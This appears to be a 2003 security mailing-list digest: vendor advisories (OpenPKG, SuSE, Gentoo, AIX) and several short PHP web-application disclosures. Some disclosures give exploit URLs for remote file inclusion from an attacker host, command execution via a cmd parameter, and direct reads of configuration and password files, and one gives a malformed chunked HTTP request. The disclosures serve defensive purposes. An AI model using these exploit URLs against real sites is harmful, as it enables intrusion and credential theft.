[SecurityOffice] Netcharts XBRL Server v4.0.0 Information Leakage Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: MD5 - --[ Netcharts XBRL Server v4.0.0 Information Leakage Vulnerability ]-- - --[ Type Information Leakage - --[ Release Date March 17, 2003 - --[ Product / Vendor NetCharts XBRL Server 4.0 is a data visualization service that generates charts and graphs, tables, and reports. It can be used alone or in conjunction with any web infrastructure from the simplest CGI scripts to the most sophisticated Enterprise Application Server. Any data source - Oracle - Sybase - Any JDBC - Any ODBC: Excel, Access, SQL Server - Legacy systems - XBRL - XML - and others Anyhow, anywhere - TIFF, BMP, JPEG - Java Applets - Flash, PDF, HTML pages - J2EE - COM / ASP / .NET - Cold Fusion - and more http://www.visualmining.com - --[ Summary A client may connect to the target machine and deliver several requests with an invalid chunked encoded body. The potential for information leakage is great but the risk is mitigated somewhat by the unpredictability of the query-response desynchronisation. Depending on the target site this may be somewhat exploitable by a malicious user to redirect other users to a specific response by saturating the communcation channels with a desired response. SNIP GET /index.jsp HTTP/1.1 Host: victim.com Transfer-Encoding: Chunked 53636f7474 SNIP Related: Recently disclosured advisory: http://online.securityfocus.com/bid/6320 - --[ Tested Netcharts XBRL Server v4.0.0 for Windows 2000 - --[ Vulnerable Netcharts XBRL Server v4.0.0 for Windows 2000 - --[ Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. - --[ Author Tamer Sahin [EMAIL PROTECTED] http://www.securityoffice.net All our advisories can be viewed at http://www.securityoffice.net/articles/ Please send suggestions, updates, and comments to [EMAIL PROTECTED] (c) 2002 SecurityOffice This Security Advisory may be reproduced and distributed, provided that this Security Advisory is not modified in any way and is attributed to SecurityOffice and provided that such reproduction and distribution is performed for non-commercial purposes. Tamer Sahin http://www.securityoffice.net -BEGIN PGP SIGNATURE- Version: 2.6 iQEVAwUAPnXY7fpL5ibJRTtBAQGXHAf/aFEOVrmg+j6Jv9gLKjagsKaoxU+BvVLq 2pQ70Am/UaPTQizUmHGaLKY0X+VsZD256HLqXnmtk9QFcTXh+aZVJxIW+T8M1FFj NgKNTVqECC8NnXiBVpo2SNJZEX77ufgBvOohAXuaI5mtZ6YuzRt8NpcC0+2phMOS bXRgfGZCNXCtzvNoKjL1miEiJHnwDuNRHP4ISTKhVRSOPZhVDatYnY/QoKWUvwAu n7O5WoW5tWLmVTcTdmcxa+qXVjbei+IdYIay7xFJvzwJz86/G0aD9ERrn9oVcdQw 1hG2oZkqWMJZyvnQhtlWWIr5GCjTSgIVzvc83UtSsN9Cr5IRw2hBbw== =5zfY -END PGP SIGNATURE-
php-Board (php)
Informations :
°°
Website : http://www.hp-planet.de
Version : 1
Problem : Informations disclosure
PHP Code/Location :
°°°
login.php :
-
function passwd2($user)
{
$password="nicht registriert";
if (file_exists("user/".$user.".txt"))
{
$fp = fopen("user/".$user.".txt","r");
$data = fgetcsv($fp,1,"#");
fclose($fp);
$password=$data[0];
}
return($password);
}
-
Exploit :
°
http://[target]/user/[NICKNAME].txt
More details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
http://www.phpsecure.org
_
DotBr (PHP)
Informations : °° Website : http://dotbr.org Version : 0.1 Problems : - phpinfo() - Informations disclosure - System commands execution PHP Code/Location : °°° foo.php3 : - - config.inc : - SQL password - SQL host - SQL username - SQL DB name admin/exec.php3 : --- --- admin/system.php3 : --- --- Exploits : °° http://[target]/foo.php3 http://[target]/config.inc http://[target]/admin/exec.php3?cmd=[COMMAND] http://[target]/admin/system.php3?cmd=[COMMAND] More Details : °° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n http://www.phpsecure.org _
Presentation on Writing Secure Programs for Linux and Unix in Maryland
I will be giving a free presentation on how to write secure programs for Linux and Unix this coming Thursday, Feb. 20, 2003, at 7-8pm. It will be at the University of Baltimore in Baltimore, Maryland (USA), in the Business Center Auditorium. The presentation is intended for software developers, and will emphasize specific programming approaches and guidelines to counter common attacks. The presentation will be somewhat technical. For directions, see: http://www.ubalt.edu/glance/glance_directions.html The parking lot might be full. You might find street parking, or you can park in the garage on Maryland Ave. & Biddle Street. A map of the campus is at: http://www.ubalt.edu/glance/campusmap.html
Re: Riched20.DLL attribute label buffer overflow vulnerability
Dear Jie Dong,
Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.
--Sunday, February 16, 2003, 4:30:50 PM, you wrote to [EMAIL PROTECTED]:
JD>The following RTFfile may result in illegal operation :
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134\'cb\'ce\'cc\'e5;}}{\colortbl
JD> ;\red255\green0\blue255;}\viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121
JD> www.yoursft.com\fs20\par } "\fs" was used for setting the size of
--
~/ZARAZA
×åëîâåê ýòî òàéíà... ÿ çàíèìàþñü ýòîé òàéíîé ÷òîáû áûòü ÷åëîâåêîì. (Äîñòîåâñêèé)
GLSA: nethack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - GENTOO LINUX SECURITY ANNOUNCEMENT 200302-08 - - - PACKAGE : nethack SUMMARY : buffer overflow DATE: 2003-02-18 09:10 UTC EXPLOIT : local - - - Overflowing a buffer in nethack may lead to privelige escalation to games uid. Read the full advisory at: http://marc.theaimsgroup.com/?l=bugtraq&m=104489201032144&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running app-games/nethack upgrade to nethack-3.4.0-r6 as follows: emerge sync emerge -u nethack emerge clean - - - [EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz - - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+UfhsfT7nyhUpoZMRAhFfAJ9asnqYIFPxQ5x0NrI0TX95AoznHACgvDs3 IGHP5+mr6/l6VFSm1egWoNI= =UKVa -END PGP SIGNATURE-
D-Forum (PHP)
Informations :
°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°
/includes/header.php3 :
---
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--
/includes/footer.php3 :
---
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---
Exploits :
°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt
Patch :
°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
Kietu ( PHP )
Informations :
°°
Website : http://kietu.free.fr
Version : 2.0, 2.3
Problem : Include file
PHP Code/Location :
°°°
hit.php :
--
if (!get_cfg_var("register_globals")) {
$kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
$kietu["website"] = $HTTP_GET_VARS["website"];
$kietu["appel"] = $HTTP_GET_VARS["appel"];
$kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
$kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
$kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
}
else {
$kietu["remote_addr"] = $REMOTE_ADDR;
$kietu["http_user_agent"] = $HTTP_USER_AGENT;
$kietu["website"] = $website;
$kietu["appel"] = $appel;
$kietu["http_referer"] = $HTTP_REFERER;
$kietu["php_self"] = $PHP_SELF;
$kietu["url_hit"] = $url_hit;
}
require ($kietu["url_hit"]."config.php");
--
Exploit :
°
http://[target]/hit.php?url_hit=http://[attacker]/
with :
http://[attacker]/config.php
Patch :
°°°
A patch can be found on http://www.phpsecure.org
More details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
This hole was published in "the Hackademy Journal 01", october 2002
(http://www.dmpfrance.com).
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.fr.msn.be
[OpenPKG-SA-2003.010] OpenPKG Security Advisory (php)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2003.010 18-Feb-2003 Package: php, apache Vulnerability: arbitrary file access and code execution OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT == php-4.3.0-20030115 >= php-4.3.1-20030218 <= apache-1.3.27-20030212 >= apache-1.3.27-20030218 >= apache-1.3.27-20021228 >= apache-1.3.27-20030218 OpenPKG 1.2 == php-4.3.0-1.2.0 >= php-4.3.0-1.2.1 == apache-1.3.27-1.2.0 >= apache-1.3.27-1.2.1 OpenPKG 1.1 noneN.A. Dependent Packages: none Description: Kosmas Skiadopoulos discovered a serious security vulnerability [0] in the CGI SAPI of PHP version 4.3.0. PHP [1] contains code for preventing direct access to the CGI binary with configure option "--enable-force-cgi-redirect" and php.ini option "cgi.force_redirect". In PHP 4.3.0 there is a bug which renders these options useless. Please note that this bug does NOT affect any of the other SAPI modules such as the Apache or ISAPI modules. Anyone with access to websites hosted on a web server which employs the CGI module may exploit this vulnerability to gain access to any file readable by the user under which the webserver runs. A remote attacker could also trick PHP into executing arbitrary PHP code if attacker is able to inject the code into files accessible by the CGI. This could be for example the web server access-logs. Please check whether you are affected by running "/bin/rpm -q php apache" and "/bin/rpm -qi apache | grep with_mod_php". If you have either the "php" or "apache" with option "with_mod_php" packages installed and their version is affected (see above), we recommend that you immediately upgrade (see Solution) [2][3]. Solution: Select the updated source RPM appropriate for your OpenPKG release [4][5], fetch it from the OpenPKG FTP service [6] or a mirror location, verify its integrity [7], build a corresponding binary RPM from it [2] and update your OpenPKG installation by applying the binary RPM [3]. For the release OpenPKG 1.2, perform the following operations to permanently fix the security problem for apache with mod_php. For other releases adjust this recipe accordingly. $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.2/UPD ftp> get apache-1.3.27-1.2.1.src.rpm ftp> bye $ /bin/rpm -v --checksig apache-1.3.27-1.2.1.src.rpm $ /bin/rpm --rebuild --define 'with_mod_php yes' \ apache-1.3.27-1.2.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/apache-1.3.27-1.2.1.*.rpm References: [0] http://www.php.net/release_4_3_1.php [1] http://www.php.net/ [2] http://www.openpkg.org/tutorial.html#regular-source [3] http://www.openpkg.org/tutorial.html#regular-binary [4] ftp://ftp.openpkg.org/release/1.2/UPD/php-4.3.0-1.2.1.src.rpm [5] ftp://ftp.openpkg.org/release/1.2/UPD/apache-1.3.27-1.2.1.src.rpm [6] ftp://ftp.openpkg.org/release/1.2/UPD/ [7] http://www.openpkg.org/security.html#signature For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For instance, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQE+Ul0CgHWT4GPEy58RAiylAJ0UMcYLUNYbOOl1oFIuqfAxWALcagCgxUsx I0CUzWnNLnX57B9wHXCwWWQ= =dpIT -END PGP SIGNATURE-
[OpenPKG-SA-2003.009] OpenPKG Security Advisory (w3m)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2003.009 18-Feb-2003 Package: w3m Vulnerability: cookie information leak OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= w3m-0.3.2.1-20021126 >= w3m-0.3.2.2-20021205 OpenPKG 1.2 N.A.>= w3m-0.3.2.2-1.2.0 OpenPKG 1.1 <= w3m-0.3.1-1.1.0 >= w3m-0.3.1-1.1.1 Affected Releases: Dependent Packages: none Description: According to Hironori Sakamoto, one of the w3m developers, two security vulnerabilities exist in w3m [0]. Releases before 0.3.2.1 do not escape an HTML tag in a frame, which allows remote attackers to access files or cookies [1]. Releases before 0.3.2.2 do not properly escape HTML tags in the ALT attribute of an IMG tag, which could allow remote attackers to access files or cookies [2]. The Common Vulnerabilities and Exposures (CVE) project assigned the ids CAN-2002-1335 [3] and CAN-2002-1348 [4] to these problems. We have backported the patch to the 0.3.1 release. Please check whether you are affected by running "/bin/rpm -q w3m". If you have the "w3m" package installed and its version is affected (see above), we recommend that you immediately upgrade it (see Solution) [5][6]. Solution: Select the updated source RPM appropriate for your OpenPKG release [7], fetch it from the OpenPKG FTP service [8] or a mirror location, verify its integrity [9], build a corresponding binary RPM from it [5] and update your OpenPKG installation by applying the binary RPM [6]. For the release OpenPKG 1.1, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.1/UPD ftp> get w3m-0.3.1-1.1.1.src.rpm ftp> bye $ /bin/rpm -v --checksig w3m-0.3.1-1.1.1.src.rpm $ /bin/rpm --rebuild w3m-0.3.1-1.1.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/w3m-0.3.1-1.1.1.*.rpm References: [0] http://w3m.sourceforge.net/ [1] http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200211.month/838.html [2] http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200212.month/843.html [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1335 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1348 [5] http://www.openpkg.org/tutorial.html#regular-source [6] http://www.openpkg.org/tutorial.html#regular-binary [7] ftp://ftp.openpkg.org/release/1.1/UPD/w3m-0.3.1-1.1.1.src.rpm [8] ftp://ftp.openpkg.org/release/1.1/UPD/ [9] http://www.openpkg.org/security.html#signature For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For instance, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQE+UijXgHWT4GPEy58RAmIIAJ9EmK4PGY36CKa5yGJkUHUQN0mzfACdE4GJ vO43TJW7bwzDxDWOKu9jH4I= =lrjv -END PGP SIGNATURE-
[OpenPKG-SA-2003.011] OpenPKG Security Advisory (lynx)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2003.011 18-Feb-2003 Package: lynx Vulnerability: CRLF injection vulnerability OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= lynx-2.8.4-20020206 >= lynx-2.8.4-20021216 OpenPKG 1.2 <= N.A. >= lynx-2.8.4-1.2.0 OpenPKG 1.1 <= lynx-2.8.4-1.1.0 >= lynx-2.8.4-1.1.1 Affected Releases: Dependent Packages: none Description: Ulf Harnhammar posted information [0] reporting a "CRLF Injection" problem with Lynx [1] 2.8.4 and earlier. It is possible to inject false HTTP headers into an HTTP request that is provided on the command line, via a URL containing encoded carriage return, line feed, and other whitespace characters. This way, scripts that use Lynx for downloading files access the wrong site on a web server with multiple virtual hosts. The Common Vulnerabilities and Exposures (CVE) project assigned the id CAN-2002-1405 [2] to the problem. Please check whether you are affected by running "/bin/rpm -q lynx". If you have the "lynx" package installed and its version is affected (see above), we recommend that you immediately upgrade it (see Solution). [3][4] Solution: Select the updated source RPM appropriate for your OpenPKG release [5], fetch it from the OpenPKG FTP service [6] or a mirror location, verify its integrity [7], build a corresponding binary RPM from it [3] and update your OpenPKG installation by applying the binary RPM [4]. For the release OpenPKG 1.1, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.1/UPD ftp> get lynx-2.8.4-1.1.1.src.rpm ftp> bye $ /bin/rpm -v --checksig lynx-2.8.4-1.1.1.src.rpm $ /bin/rpm --rebuild lynx-2.8.4-1.1.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/lynx-2.8.4-1.1.1.*.rpm References: [0] http://www.mail-archive.com/bugtraq@securityfocus.com/msg08897.html [1] http://lynx.isc.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1405 [3] http://www.openpkg.org/tutorial.html#regular-source [4] http://www.openpkg.org/tutorial.html#regular-binary [5] ftp://ftp.openpkg.org/release/1.1/UPD/lynx-2.8.4-1.1.1.src.rpm [6] ftp://ftp.openpkg.org/release/1.1/UPD/ [7] http://www.openpkg.org/security.html#signature For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For instance, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQE+UlhugHWT4GPEy58RAr9NAKC7MXEp1KbGF9hBdS54B0lAg5ZeSACg0tKk ugQtWNDCopogBsrxmMgAlx0= =+o01 -END PGP SIGNATURE-
Re: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 <1> The aixterm issue is addressed in an efix which can be downloaded from: ftp://ftp.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z. <2> The enq issue was fixed in Feb 2000. The following filesets contain the most current version of enq: For AIX 4.3.3: bos.rte.printers.4.3.3.78 For AIX 5.1.0: bos.rte.printers.5.1.0.25 For AIX 5.2.0: bos.rte.printers.5.2.0.0 To request the PGP public key that can be used to encrypt new AIX security vulnerabilities, send email to [EMAIL PROTECTED] with a subject of "get key". Shiva Persaud AIX Security Developer [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.0 (AIX) iD8DBQE+UYPXcnMXzUg7txIRAkRNAJsFOHbxbkAc/pqqZFCCr3YK9vy5DACeMmN6 ALLNjBcnTx+VfZIiuPCDzdQ= =ufwJ -END PGP SIGNATURE- Shiva Persaud AIX Security Developer Phone: 512-838-1192 [EMAIL PROTECTED] choi sungwoon cc: Subject: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX 02/17/2003 01:00 AM Please respond to Shiva Persaud /* Title: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX Vulnerability found by Esa Etelavoun, iDEFFENSE Author: green([EMAIL PROTECTED]), dragory([EMAIL PROTECTED]) Tested on AIX 4.3.3/RS6000 Reference: lsd-pl.net's exploit Thanks to wowcode & overhead team at Wowhacker(http://www.wowhacker.org) */ I tested BOF in AIX lately. These are exploits of /usr/bin/enq and /usr/bin/X11/aixterm in AIX. (My system language is Korean...)
SuSE Security Announcement: imp (SuSE-SA:2003:0008)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:imp Announcement-ID:SuSE-SA:2003:0008 Date: Tuesday, Feb. 18th 2003 18:20 MET Affected products: 7.3, 8.0, 8.1 Vulnerability Type: remote system compromise Severity (1-10):3 SuSE default package: no Cross References: CAN-2003-0025 Content of this advisory: 1) security vulnerability resolved: Multiple SQL-Injection problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - mod_php4 - libmcrypt - vim - pam_xauth - openldap2 - mpg123 - syslinux 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information IMP is a well known PHP-based web-mail system. Some SQL-injection vulnerabilities were found in IMP 2.x that allow an attacker to access the underlying database. No authentication is needed to exploit this bug. An attacker can gain access to protected information or, in conjunction with PostgreSQL, execute shell commands remotely. There is no temporary fix known. Please install the new packages from our FTP servers. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/imp-2.2.6-248.i586.rpm 17b26d9e48a75cc499b6d4da0c1067c3 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/imp-2.2.6-248.src.rpm 6e3e250a900070b1571f8f3b050616a8 SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/zima1/imp-2.2.6-246.i386.rpm d50ed25aecc357a720f901676a399def source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/imp-2.2.6-246.src.rpm 7e9fcc065b3096fc7f40f1c958ea9b0b SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/zima1/imp-2.2.6-247.i386.rpm bf74d9df4b7e9b02d922609c226cff92 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/imp-2.2.6-247.src.rpm b858c113f66145fdc38d6629b1dbafb8 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zima1/imp-2.2.6-85.sparc.rpm b0bf87d69dfcd8aae2ec3d3a07d14899 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/imp-2.2.6-85.src.rpm bd236d18ab61c67fe4929be6ff7fa82a AXP Alpha Platform: PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zima1/imp-2.2.6-189.ppc.rpm 0e186259b4441dd1347e4e5e6f14aac9 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/imp-2.2.6-189.src.rpm 8688d0e39dae720267a568562a0548c3 __ 2) Pending vulnerabilities in SuSE Distributions and Workarounds: - mod_php4 A buffer overflow in the wordwrap() function has been reported. New packages will be prepared and should be available on our ftp servers soon. - libmcrypt Several buffer overflows in libmcrypt were discovered by Ilia Alshanetsky. The buffer overflows can lead to system compromise. New packages are currently being build. - vim Georgi Guninski <[EMAIL PROTECTED]> reported a security problem with vim's modeline support that allows the execution of commands when a malformed file was opened. This bug may even be exploited through MUAs like mutt. We recommend to turn off this feature globally by adding the line: set modelines=0 to the global configuration file /etc/vimrc. All currently supported SuSE products are affected by this problem. Modeline support is disabled by default in future version of SuSE Linux. - openldap2 The BER decoding routines of the openldap2 packages for SL 8.1 and SLES8 contained a bug which allowed remote attackers to mount a DoS attack against vulnerable OpenLDAP servers. It is necessary to update the openldap2-devel, openldap2-client and openldap2 packages in order to prevent such attack. New packages will be available on our FTP servers soon. - mpg123 Our update directories on our ftp server for the SuSE Linux distributions 7
SuSE Security Announcement: mod_php4 (SuSE-SA:2003:0009)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:mod_php4 Announcement-ID:SuSE-SA:2003:0009 Date: Tuesday, Feb. 18th 2003 18:22 MET Affected products: 8.1 SuSE Linux Enterprise Server 8 Vulnerability Type: remote system compromise Severity (1-10):2 SuSE default package: no Cross References: CAN-2002-1396 Content of this advisory: 1) security vulnerability resolved: buffer overflow problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - libmcrypt 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The Apache module mod_php4 supports the widely used Web scripting language PHP. Under some special circumstances a buffer overflow can be triggered in mod_php4's wordwrap() function. This buffer overflow can be used to overwrite heap memory and possibly can lead to remote system compromise. Just mod_php4 versions greater than 4.1.2 and less than 4.3.0 are vulnerable. This affects SuSE Linux 8.1 and all SuSE Linux Enterprise Server 8 based products. There is no temporary fix known. Please install the new packages from our FTP servers. After updating the mod_php4 module has to be reloaded by Apache. This can be done by restarting the apache webserver using the following command as root: rcapache restart Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-4.2.2-168.i586.rpm 5a6c81dc2b214142dbea1dcef06d1fcf patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-4.2.2-168.i586.patch.rpm 8e95af112e690034e8e851143d63db46 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-core-4.2.2-168.i586.rpm 6c2931abeab4433c1c243b7a96505366 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-core-4.2.2-168.i586.patch.rpm dacf9f57a098b292e62b9ddc25a84a40 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-devel-4.2.2-168.i586.rpm ddaa55a270c028fd0afd3159b1299f61 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-devel-4.2.2-168.i586.patch.rpm 702c465ede7dbeb6c4652b2f3ea1c5f4 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-servlet-4.2.2-168.i586.rpm 87d7b9d5e5a3f5e25aa6096903979fdd patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-servlet-4.2.2-168.i586.patch.rpm a1fef4f3966a83de8a11a36f395b9a82 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-aolserver-4.2.2-168.i586.rpm 9579610398d92fefbf859e33fd500401 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mod_php4-aolserver-4.2.2-168.i586.patch.rpm 1bd0367d2fef87ae1fc134825c17319b source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/mod_php4-4.2.2-168.src.rpm 71d85b24a8c57a45a5a66fab56c7b1b8 __ 2) Pending vulnerabilities in SuSE Distributions and Workarounds: - libmcrypt Several buffer overflows in libmcrypt were discovered by Ilia Alshanetsky. The buffer overflows can lead to system compromise. New packages are currently being build. __ 3) standard appendix: authenticity verification, additional information - Package authenticity verification: SuSE update packages are available on many mirror ftp servers all over the world. While this service is being considered valuable and important to the free and open source software community, many users wish to be sure about the origin of the package and its content before installing the package. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package. 1) execute the
Re: CSSA-2003-007.0 Advisory withdrawn.
-BEGIN PGP SIGNED MESSAGE- Just to clarify this a bit further, the mod_dav module for Apache is not vulnerable to the format string vulnerability (as outlined in the original advisory from SCO, CAN-2002-0842) mod_dav contains code that logs various errors and uses ap_log_rerror() to do so. In mod_dav for Apache, ap_log_rerror is never called with strings that can be influenced by a remote user. Now Oracle added code to their version of mod_dav to log gateway errors, but gateway errors contain strings that can be controlled by a remote user. Therefore Oracle was vulnerable to a format string issue, but no base release of Apache with mod_dav was vulnerable. We did some research this morning after SCO released their advisory. According to their ftp site SCO shipped OpenLinux with a standard copy of mod_dav which was not vulnerable to this format string issue. Their advisory, CSSA-2003-007.0 referenced new packages where they added a patch which, unfortunately, added in code to log of gateway errors and contained a format string vulnerability. Thanks, Mark -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iQCVAwUBPlKFj+6tTP1JpWPZAQE6awQA43RYlKHCZME4KszH/zDOMbuTeTUybvaW GWP88jowg0+JtVDl+D7JFGFxdgrrxBD/sWTPRV361l3TKUYXnXcuDIW2OnWdWRtq 4zulMANv1kFs/mqRPz1naJ+hZPaVrYKVxSv2mhDz4fjohsBjUVlNOuaoosONl0se lWS9MFQTRaI= =mhD7 -END PGP SIGNATURE-
MDKSA-2003:017 - Updated pam packages fix root authorization handling in pam_xauth module
